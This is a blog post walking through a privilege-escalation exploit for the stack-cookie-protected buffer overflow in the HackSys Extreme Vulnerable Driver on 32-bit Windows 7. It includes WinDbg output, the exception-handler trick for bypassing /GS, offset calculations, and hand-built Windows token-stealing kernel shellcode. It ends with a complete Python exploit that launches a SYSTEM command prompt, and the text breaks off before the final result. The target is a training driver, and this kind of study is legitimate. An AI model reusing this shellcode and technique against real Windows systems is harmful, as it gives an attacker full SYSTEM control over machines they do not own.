HEVD Stack Overflow GS

Nytro · September 6, 2017

Posted on September 5, 2017

Lately, I've decided to play around with HackSys Extreme Vulnerable Driver (HEVD) for fun. It's a great way to familiarize yourself with Windows exploitation. In this blog post, I'll show how to exploit the stack overflow that is protected with /GS stack cookies on 32-bit Windows 7 SP1. You can find the source code here. It also includes a few more exploits and a Win10 pre-anniversary version of the exploit for the regular stack buffer overflow vulnerability.

Triggering the Vulnerable Function

To start, we need to find the ioctl dispatch routine in HEVD. Looking at the IRP_MJ_DEVICE_CONTROL entry in the driver object's dispatch table, we see that the dispatch function is at hevd+508e.

kd> !drvobj hevd 2
Driver object (852b77f0) is for:
 \Driver\HEVD
DriverEntry:   995cb129	HEVD
DriverStartIo: 00000000	
DriverUnload:  995ca016	HEVD
AddDevice:     00000000	

Dispatch routines:
[00] IRP_MJ_CREATE                      995c9ff2	HEVD+0x4ff2
[01] IRP_MJ_CREATE_NAMED_PIPE           995ca064	HEVD+0x5064
...
[0e] IRP_MJ_DEVICE_CONTROL              995ca08e	HEVD+0x508e
[0f] IRP_MJ_INTERNAL_DEVICE_CONTROL     995ca064	HEVD+0x5064
[10] IRP_MJ_SHUTDOWN                    995ca064	HEVD+0x5064
[11] IRP_MJ_LOCK_CONTROL                995ca064	HEVD+0x5064
[12] IRP_MJ_CLEANUP                     995ca064	HEVD+0x5064
[13] IRP_MJ_CREATE_MAILSLOT             995ca064	HEVD+0x5064
[14] IRP_MJ_QUERY_SECURITY              995ca064	HEVD+0x5064
[15] IRP_MJ_SET_SECURITY                995ca064	HEVD+0x5064
...

Finding the ioctl request number requires very light reverse engineering. We eventually want to end up at hevd+515a. At hevd+50b4, 222003h is subtracted from the request number. If the result is 0 (that is, the request number was 222003h), execution jumps to hevd+5172; otherwise it falls through to hevd+50bf. In that basic block, a further 4 is subtracted from the request number. If the result is 0, we are where we want to be. Therefore, our ioctl number should be 222003h + 4 = 222007h.
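
The arithmetic above lines up with how Windows packs ioctl codes in the CTL_CODE macro: device type in bits 16 and up, access in bits 14-15, function number in bits 2-13, and transfer method in bits 0-1. As a small sanity check, here is a Python 3 sketch (the helper names are mine and are not part of HEVD or the exploit source) that decodes both values:

```python
def ctl_code(device_type, function, method, access):
    """Pack fields the same way the Windows CTL_CODE macro does."""
    return (device_type << 16) | (access << 14) | (function << 2) | method


def decode_ioctl(code):
    """Split an ioctl code back into its CTL_CODE fields."""
    return {
        "device_type": (code >> 16) & 0xFFFF,
        "access": (code >> 14) & 0x3,
        "function": (code >> 2) & 0xFFF,
        "method": code & 0x3,
    }


first = decode_ioctl(0x222003)       # value compared at hevd+50b4
target = decode_ioctl(0x222003 + 4)  # value needed to reach hevd+515a

print(hex(0x222003 + 4))             # 0x222007
print(hex(first["function"]), hex(target["function"]))  # 0x800 0x801
```

Adding 4 increments the function field by one and leaves the device type (0x22), access (0), and method (3, METHOD_NEITHER) fields unchanged.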

Eventually, a memcpy is reached where the calling function does not check the copy size.

To give the overflow code a quick run, we call it with benign input using the code below. You can find the implementation of mmap and write in the full source code.

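def trigger_stackoverflow_gs(addr, size):
    dwReturn = c_ulong()
    # Open a handle to the HEVD device (DEVICE_NAME is defined elsewhere in the exploit).
    driver_handle = kernel32.CreateFileW(DEVICE_NAME,
                                         GENERIC_READ | GENERIC_WRITE,
                                         0, None, OPEN_EXISTING, 0, None)
    if not driver_handle or driver_handle == -1:
        print "[-] Could not open a handle to the driver"
        sys.exit(1)

    # Pass the user buffer and its size to the vulnerable ioctl handler.
    print "[+] IOCTL: 0x222007"
    dev_ioctl = kernel32.DeviceIoControl(driver_handle, 0x222007,
                                         addr, size,
                                         None, 0,
                                         byref(dwReturn), None)
    return dev_ioctl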

m = mmap()
write(m, 'A'*10)
trigger_stackoverflow_gs(m, 10)

In WinDbg, the debug output confirms that we are calling the right ioctl.

From the figure, we can see that the kernel buffer is 0x200 bytes in size, so if we run the PoC again with 0x250 As, we should overflow the stack cookie and blue screen our VM.

Indeed, the bugcheck tells us that the system crashed due to a stack buffer overflow. Stack cookies in Windows are first XORed with ebp before they're stored on the stack. If we take the cookie in the bugcheck, and XOR it with 41414141, the result should resemble a stack address. Specifically, it should be the stack base pointer for hevd+48da.

kd> ? e9d25b91 ^ 41414141
Evaluate expression: -1466754352 = a8931ad0
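
The same check is easy to reproduce outside the debugger. This Python 3 sketch uses the cookie value from the bugcheck and the 0x41414141 filler; the variable names are illustrative, and it assumes, as described above, that the reported value is our filler XORed with ebp.

```python
import struct

reported = 0xE9D25B91   # cookie value shown in the bugcheck
filler = 0x41414141     # 'AAAA', what we wrote over the saved cookie

# XOR is its own inverse, so removing the filler leaves ebp.
ebp = reported ^ filler

# WinDbg also prints the result as a signed 32-bit integer.
signed = struct.unpack("<i", struct.pack("<I", ebp))[0]

print(hex(ebp), signed)  # 0xa8931ad0 -1466754352
```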

Bypassing Stack Cookies

A common way to bypass stack cookies, introduced by David Litchfield, is to cause the program to throw an exception before the stack cookie is checked at the end of the function. This works because when an exception occurs, the stack cookie is not checked.

There are two ways [generating an exception] might happen--one we can control and the other is dependent of the code of the vulnerable function. In the latter case, if we overflow other data, for example parameters that were pushed onto the stack to the vulnerable function and these are referenced before the cookie check is performed then we could cause an exception here by setting this data to something that will cause an exception. If the code of the vulnerable function has been written in such a way that no opportunity exists to do this, then we have to attempt to generate our own exception. We can do this by attempting to write beyond the end of the stack.

For us, it's easy because the vulnerable function uses memcpy. We can simply force memcpy to fault by letting it continue reading the source buffer all the way into unmapped memory.

I use my mmap function to map two adjacent pages, then munmap to unmap the second page. mmap and munmap are just simple wrappers I wrote for NtAllocateVirtualMemory and NtFreeVirtualMemory respectively. The idea is to place the source buffer at the end of the page that remains mapped, and have the vulnerable memcpy read off into the unmapped page to cause an exception.

To test this, we'll use the PoC code below.

m = mmap(size=0x2000)
munmap(m+0x1000)

trigger_stackoverflow_gs(m+0x1000-0x250, 0x251)
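
To make the address arithmetic in this PoC explicit, here is a small Python 3 sketch. It does not touch real memory: the base address is only an illustrative value for m, and bytes_before_fault is a hypothetical helper that models a simple forward copy.

```python
PAGE_SIZE = 0x1000


def bytes_before_fault(src, length, unmapped_start):
    """Return how many bytes a forward copy can read from src before it
    reaches unmapped_start, capped at length."""
    readable = max(0, unmapped_start - src)
    return min(length, readable)


m = 0x1540000                      # illustrative base of the two-page mapping
unmapped = m + PAGE_SIZE           # second page, released by munmap
src = m + PAGE_SIZE - 0x250        # buffer ends exactly at the page boundary
length = 0x251                     # one byte more than is mapped

copied = bytes_before_fault(src, length, unmapped)
print(hex(src), hex(copied), copied < length)  # 0x1540db0 0x250 True
```

Because the requested size is one byte larger than what is readable, the copy has to touch the unmapped page, while the 0x250 readable bytes are already more than the 0x200-byte kernel buffer can hold.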

Back in the debugger, we can observe that an exception was thrown and eip was overwritten as a result of the exception handler being overwritten.

The next step is to find the offset of the As that overwrite the exception handler so we can point eip at our shellcode. You could narrow it down with a binary search, but an easier method is to use a De Bruijn sequence as the payload. I usually use Metasploit's pattern_create.rb and pattern_offset.rb to find the exact offset in my buffer.

Figure: Exception handler crash with the pattern_create.rb payload

The figure above shows us that 41367241 overwrites the exception handler address and therefore ends up in eip.

kd> .formats 41367241
Evaluate expression:
  Hex:     41367241
  Decimal: 1094087233
  Octal:   10115471101
  Binary:  01000001 00110110 01110010 01000001
  Chars:   A6rA
  Time:    Wed Sep  1 18:07:13 2004
  Float:   low 11.4029 high 0
  Double:  5.40551e-315

Reversing the byte order due to endianness, we get Ar6A, which pattern_offset.rb tells us is at offset 528 (0x210). Therefore, our source buffer will be of size 0x210+4, where the extra 4 bytes hold the address of our shellcode.
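
If Metasploit is not at hand, the lookup can be approximated in a few lines. The Python 3 sketch below regenerates a pattern in the same upper/lower/digit style that pattern_create.rb produces and searches it for the little-endian bytes of the eip value. It is an approximation of those tools rather than their actual code, and the function names are my own.

```python
import struct
from itertools import product
from string import ascii_lowercase, ascii_uppercase, digits


def cyclic_pattern(length):
    """Build an 'Aa0Aa1Aa2...' style pattern of the requested length."""
    triples = ("".join(t) for t in product(ascii_uppercase, ascii_lowercase, digits))
    out = []
    size = 0
    for triple in triples:
        if size >= length:
            break
        out.append(triple)
        size += 3
    return "".join(out)[:length]


def pattern_offset(value, length=0x1000):
    """Find the offset of a 32-bit register value within the pattern."""
    needle = struct.pack("<I", value).decode("ascii")  # undo little-endian order
    return cyclic_pattern(length).find(needle)


offset = pattern_offset(0x41367241)
print(offset, hex(offset))  # 528 0x210
```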

Constructing Shellcode

Since there are 0x1000-0x210-4 bytes of unused space in our allocated page, we can just put our shellcode at the beginning of the page. I use common Windows token stealing shellcode that basically iterates through the _EPROCESS structures, looks for the SYSTEM process, and copies the SYSTEM process' token. Additionally, for convenience in breaking at the shellcode, I prepend the shellcode with a breakpoint (\xcc).

\xcc\x31\xc0\x64\x8b\x80\x24\x01\x00\x00\x8b\x40\x50\x89\xc1\x8b\x80\xb8\x00
\x00\x00\x2d\xb8\x00\x00\x00\x83\xb8\xb4\x00\x00\x00\x04\x75\xec\x8b\x90\xf8
\x00\x00\x00\x89\x91\xf8\x00\x00\x00

Our shellcode still isn't complete yet; the shellcode doesn't know where to return to after it executes. To search for a return address, let's inspect the call stack in the debugger when the shellcode executes.

kd> k
 # ChildEBP RetAddr
WARNING: Frame IP not in any known module. Following frames may be wrong.
00 a88cf114 82ab3622 0x1540000
01 a88cf138 82ab35f4 nt!ExecuteHandler2+0x26
02 a88cf15c 82ae73b5 nt!ExecuteHandler+0x24
03 a88cf1f0 82af005c nt!RtlDispatchException+0xb6
04 a88cf77c 82a79dd6 nt!KiDispatchException+0x17c
05 a88cf7e4 82a79d8a nt!CommonDispatchException+0x4a
06 a88cf868 995c9969 nt!KiExceptionExit+0x192
07 a88cf86c a88cf8b4 HEVD+0x4969
08 a88cf870 01540dec 0xa88cf8b4
09 a88cf8b4 41414141 0x1540dec
0a a88cf8b8 41414141 0x41414141
0b a88cf8bc 41414141 0x41414141
...
51 a88cfad0 995c99ca 0x41414141
52 a88cfae0 995ca16d HEVD+0x49ca
53 a88cfafc 82a72593 HEVD+0x516d
54 a88cfb14 82c6699f nt!IofCallDriver+0x63

hevd+4969 is the address of the instruction after the memcpy, but we can't return here because the portion of the stack that the remaining code uses is corrupted. Fixing the stack to the correct values would be extremely annoying. Instead, returning to hevd+49ca, which is the return address of the stack frame right below hevd+4969, makes more sense.

However, if you adjust the stack and return to hevd+49ca, you'll still get a crash. The problem is at hevd+5260 where edi+0x1c is dereferenced. edi at this point is 0 because registers are XORed with themselves before the exception handler assumes control and neither the program nor our shellcode touched edi.

In a normal execution, edi and other registers are restored in __SEH_epilog4. These values are of course restored from the stack. Taking a88cf86c from the stack trace above, we can dump the stack and look for the saved values. They are actually quite easy to find here because hevd+5dcc stands out. hevd+5dcc is the address of the debug print string, which is restored into ebx.

kd> dds a88cf86c
a88cf86c  995c9969 HEVD+0x4969
a88cf870  a88cf8b4
a88cf874  01540dec
a88cf878  00000218
a88cf87c  995ca760 HEVD+0x5760
a88cf880  995ca31a HEVD+0x531a
a88cf884  00000200
a88cf888  995ca338 HEVD+0x5338
a88cf88c  a88cf8b4
a88cf890  995ca3a2 HEVD+0x53a2
a88cf894  00000218
a88cf898  995ca3be HEVD+0x53be
a88cf89c  01540dec
a88cf8a0  31d15d0b
a88cf8a4  8c843f68 <-- edi
a88cf8a8  8c843fd8 <-- esi
a88cf8ac  995cadcc HEVD+0x5dcc <-- ebx
a88cf8b0  455f5359
a88cf8b4  41414141
a88cf8b8  41414141

To obtain the offset of edi, just subtract esp from the stack address that holds its saved value.

kd> ? a88cf8a4 - esp
Evaluate expression: 1932 = 0000078c
kd> dds a88cfad0 la
a88cfad0  a88cfae0
a88cfad4  995c99ca HEVD+0x49ca
a88cfad8  01540dec
a88cfadc  00000218
a88cfae0  a88cfafc
a88cfae4  995ca16d HEVD+0x516d
a88cfae8  8c843f68
a88cfaec  8c843fd8
a88cfaf0  86c3c398
a88cfaf4  8586f5f0
kd> ? a88cfad0 - esp
Evaluate expression: 2488 = 000009b8

Similarly, the offset of the frame to return to is the difference between a88cfad0 and esp.
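
Both offsets can be double-checked from the addresses in the dumps. In this Python 3 sketch, esp is inferred from the first WinDbg expression (it is not printed directly in the output above), and the variable names are illustrative.

```python
saved_edi_addr = 0xA88CF8A4   # stack slot holding the saved edi
frame_addr = 0xA88CFAD0       # slot holding the saved ebp, just below hevd+49ca

edi_offset = 0x78C            # result of "? a88cf8a4 - esp"
esp = saved_edi_addr - edi_offset

ret_offset = frame_addr - esp
print(hex(esp), hex(ret_offset))  # 0xa88cf118 0x9b8

# esi and ebx sit in the two dwords that follow edi in the dump.
esi_offset = edi_offset + 4
ebx_offset = edi_offset + 8
print(hex(esi_offset), hex(ebx_offset))  # 0x790 0x794
```

Once esp is advanced by 0x9b8 it points at the saved ebp (a88cfae0), with the return address hevd+49ca right after it. The two dwords that follow (01540dec and 00000218) look like the function's two arguments, which would account for the 8 bytes released on return.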

Lastly, our shellcode should finish with pop ebp; ret 8; which results in the following:

start:
  xor eax, eax;
  mov eax,dword ptr fs:[eax+0x124]; # nt!_KPCR.PcrbData.CurrentThread
  mov eax,dword ptr [eax+0x50];     # nt!_KTHREAD.ApcState.Process
  mov ecx,eax;                      # Store unprivileged _EPROCESS in ecx
loop:
  mov eax,dword ptr [eax+0xb8];     # Next nt!_EPROCESS.ActiveProcessLinks.Flink
  sub eax, 0xb8;                    # Back to the beginning of _EPROCESS
  cmp dword ptr [eax+0xb4],0x04;    # SYSTEM process? nt!_EPROCESS.UniqueProcessId
  jne loop;
stealtoken:
  mov edx,dword ptr [eax+0xf8];     # Get SYSTEM nt!_EPROCESS.Token
  mov dword ptr [ecx+0xf8],edx;     # Copy token
restore:
  mov edi, [esp+0x78c];             # edi (IRP pointer)
  mov esi, [esp+0x790];             # esi
  mov ebx, [esp+0x794];             # move print string into ebx
  add esp, 0x9b8;
  pop ebp;
  ret 0x8;
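
For reference, the restore portion can be encoded by hand without an assembler. The Python 3 sketch below builds its bytes from the two offsets found earlier, which makes it easy to regenerate them if the offsets differ on another build. restore_stub is a hypothetical helper, and the opcode bytes are the standard x86 encodings for these specific instructions only.

```python
import struct


def restore_stub(edi_off, ret_off, ret_pop=8):
    """Encode the register-restore and return sequence as raw x86 bytes."""
    stub = b""
    stub += b"\x8b\xbc\x24" + struct.pack("<I", edi_off)      # mov edi, [esp+edi_off]
    stub += b"\x8b\xb4\x24" + struct.pack("<I", edi_off + 4)  # mov esi, [esp+edi_off+4]
    stub += b"\x8b\x9c\x24" + struct.pack("<I", edi_off + 8)  # mov ebx, [esp+edi_off+8]
    stub += b"\x81\xc4" + struct.pack("<I", ret_off)          # add esp, ret_off
    stub += b"\x5d"                                           # pop ebp
    stub += b"\xc2" + struct.pack("<H", ret_pop)              # ret ret_pop
    return stub


stub = restore_stub(0x78C, 0x9B8)
print(len(stub))  # 31
```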

Gaining NT Authority\SYSTEM

Putting everything together, the final exploit looks like this.

m = mmap(size=0x2000)
munmap(m+0x1000)
size = 0x210+4

sc = '\x31\xc0\x64\x8b\x80\x24\x01\x00\x00\x8b\x40\x50\x89\xc1\x8b\x80\xb8\x00\x00\x00\x2d\xb8\x00\x00\x00\x83\xb8\xb4\x00\x00\x00\x04\x75\xec\x8b\x90\xf8\x00\x00\x00\x89\x91\xf8\x00\x00\x00\x8b\xbc\x24\x8c\x07\x00\x00\x8b\xb4\x24\x90\x07\x00\x00\x8b\x9c\x24\x94\x07\x00\x00\x81\xc4\xb8\x09\x00\x00\x5d\xc2\x08\x00'
write(m, sc + 'A'*(0x1000-4-len(sc)) + struct.pack("<I", m))
trigger_stackoverflow_gs(m+0x1000-size, size+1)

print '\n[+] Privilege Escalated\n'
os.system('cmd.exe')
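
As a dry run of this layout (Python 3, no driver involved), the sketch below rebuilds the page contents in an ordinary bytes object and checks that the four bytes at offset 0x210 of the source buffer are the address of the shellcode. The base address is an illustrative value for m, and a run of 0xcc bytes stands in for the real shellcode.

```python
import struct

PAGE_SIZE = 0x1000
HANDLER_OFFSET = 0x210            # offset found with pattern_offset.rb
size = HANDLER_OFFSET + 4

m = 0x1540000                     # illustrative address of the mapped page
sc = b"\xcc" * 77                 # placeholder standing in for the real shellcode

# Shellcode at the start of the page, padding, then the shellcode address
# in the last four bytes before the unmapped page.
page = sc + b"A" * (PAGE_SIZE - 4 - len(sc)) + struct.pack("<I", m)

src_offset = PAGE_SIZE - size     # where the source buffer starts within the page
buf = page[src_offset:]

handler = struct.unpack("<I", buf[HANDLER_OFFSET:HANDLER_OFFSET + 4])[0]
print(hex(m + src_offset), hex(handler))  # 0x1540dec 0x1540000
```

The driver is then asked to copy size+1 bytes from that source address, so the final byte falls in the unmapped page and raises the exception after the handler pointer has been overwritten.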

And that should give us: